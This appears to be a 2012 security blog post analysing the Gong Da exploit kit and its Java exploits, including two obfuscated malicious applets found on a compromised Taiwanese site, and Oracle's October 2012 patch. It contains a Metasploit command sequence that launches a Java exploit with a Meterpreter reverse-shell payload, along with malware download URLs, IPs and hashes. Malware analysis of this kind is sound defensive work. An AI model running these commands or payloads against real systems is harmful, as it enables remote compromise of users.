You may have read my first blog post regarding the evolutions of Gong Da exploit kit, who has involve in a more complex EK by supporting most of the latest Oracle Java vulnerabilities like CVE-2011-3544 (Oracle Java Rhino exploit), CVE-2012-4681 (Oracle Java August 0day), CVE-2012-0507 (another Oracle Java exploit), CVE-2012-1723 (another Oracle Java exploit) and CVE-2012-1889 (Microsoft XML Core Services). Some previous versions of Gong Da EK had also support for CVE-2011-2140 (Adobe Flash Player) and CVE-2012-0003 (Windows Media), but it seem that the new version don’t use them anymore.
After Cool EK and BlackHole EK, Gong Da EK has integrate the exploitation of the Java vulnerability aka CVE-2012-5076 (Java Applet JAX-WS). This vulnerability, patched in version 7U9 of Oracle Java is affecting all version of Oracle Java from 7 to 7U7.
This new version was discovered on “hxxp://rdp.nhgdeerw.com/rdp/index.html” a web site how is actually still online.
“rdp.nhgdeerw.com” is hosted on 173.208.189.170, AS32097, in US and “wangmazz.com” domain name was created the 2012-11-17, through name.com registrar, for “tao we ([email protected])“.
Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11
This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Commands :
use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sessions -i 1
getuid
sysinfo
The 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.grvb.com.tw) who is actually still online. The home page of the server is loading a first Java Applet with a JAR file “Java.jar” and a second Java Applet as a single class file “eiAD.class“.
VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 Java/Downloader detection, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 CVE-2012-4681 Oracle Java Gondvv exploit detection. The detection rate is really low and a deeper analysis of these elements is interesting.
This JAR file contain a Manifest file how reveal that the file was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)” and the JAR file is signed with a RSA signature.
You can see this self-signed certificate was create the 16 October and was pretending to be generated by Microsoft and issued by Microsoft. By signing an applet, the restrictions on an applet are mostly removed. Signing an applet, basically means that the applet writer is vouching that the applet is safe. The user of a signed applet can accept the signed applet and have it run without most restrictions, or reject the applet and not have it run at all. A self-signed applet will trigger a security warning pop-up advising you on the associated risks. Similar self-signed Java Applet could be generated with java_signed_applet Metasploit exploit module.
By analyzing the source code of “Java.jar” we can see interesting arrays and functions.
The “FCKME” is an array where a space is representing a new entry in the array. The guys don’t seem to like ESET anti-virus editor of NOD-32 🙂
Encoded string is present and will be decoded by the beside “FJKOKL” function. You can see that the 29 value of the “FCKME” array will be used to complete the encoded text.
This function will remove all the “[>|<]” values of the encoded text with the following result.
The string is encoded in HEX and after decoding you will have the following result completed with “FCKME[29]” how is “.exe“.
“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)
The following table will provide all value of “FCKME” array.
With all these value we are able to decode all “FCKME” variable used in the “Java.jar” code.
As you can see the Java.jar is only a self-signed Java downloader. Finally, as pointed by @_sinn3r, this Applet is surely used as a plan B, if eiAD.class is not triggered.
By analyzing the source code of “eiAD.class” we can see interesting arrays and functions.
This variable seem to be one more time an reference to ESET anti-virus editor and especially to the “Foxxy Software Outfoxed” blogpost. (Thanks to @binjo).
Encoded string is present and will be decoded by the beside “FJKOKL” function, also used in “Java.jar“. A space is representing a new entry in the “JFI” array.
“FJKOKL” will remove all the “[>|<]” values of the encoded text with the following result.
The string is encoded in HEX and after decoding you will have the following result.
“Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc“.
The following table will provide all value of “JFI” array.
With all these value we are able to decode all “JFI” variable used in the “Java.jar” code.
With all these variables and other functions the code will be able to reconstruct CVE-2012-4681 Oracle Java vulnerability.
Another encoded string is present in “eiAD.class” and this encoded string has the same result as the “Java.jar“.
“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)
I found a Author variable occurrence “lEZdLl.class” on pastebin who was posted by a Guest the 24 September, and is equivalent to “eiAD.class“.
“HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file is actually no more existing).
Here under a demonstration video of the effectiveness of these files against anti-viruses.
Oracle has provide his Java Critical Patch Update (CPU) for October 2012 how has been released on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concern “Java Runtime Environment” and “JavaFX” components. On the 30 security vulnerabilities all of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 15 vulnerabilities have a CVSS base score upper or equal to 7.0.
As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.
